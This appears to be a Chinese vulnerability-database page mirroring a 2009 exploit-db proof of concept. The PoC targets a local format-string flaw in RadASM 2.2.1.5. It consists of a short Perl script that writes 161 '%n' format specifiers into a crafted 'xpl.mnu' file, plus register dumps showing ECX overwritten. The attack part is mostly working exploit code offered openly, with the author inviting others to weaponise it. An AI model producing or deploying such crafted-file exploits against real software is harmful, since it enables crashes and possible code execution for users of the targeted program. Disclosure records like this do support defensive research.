RadASM 2.2.1.5 - '.mnu' Local Format String (PoC)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058079 漏洞类型
发布时间 2009-08-03 更新时间 2009-08-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9345
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# RadASM 2.2.1.5 (.mnu File) Format string Poc
# By SkuLL-HacKeR
# GreetZ : hack4love - Aser ro7 - ThE g0bL!N - Qabandi
# EAX 00002E2E
# ECX 41413D92 ECX overwrited
# EDX 00000002
# EBX 00000000
# ESP 0013F894
# EBP 0013F9AC ASCII "..................................................................."
# ESI 00187658 ASCII "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n"
# EDI 0013FFFE
# EIP 0040171A TbrCreat.0040171A
# directory app
# C:\Documents and Settings\Administrateur\Bureau\aRadASM\AddIns\TbrCreate.exe
# i think is hard to exploit maybe anyone can exploit it :d
my $unicode="%n" x 161;
my $file="xpl.mnu";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $unicode ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-08-03]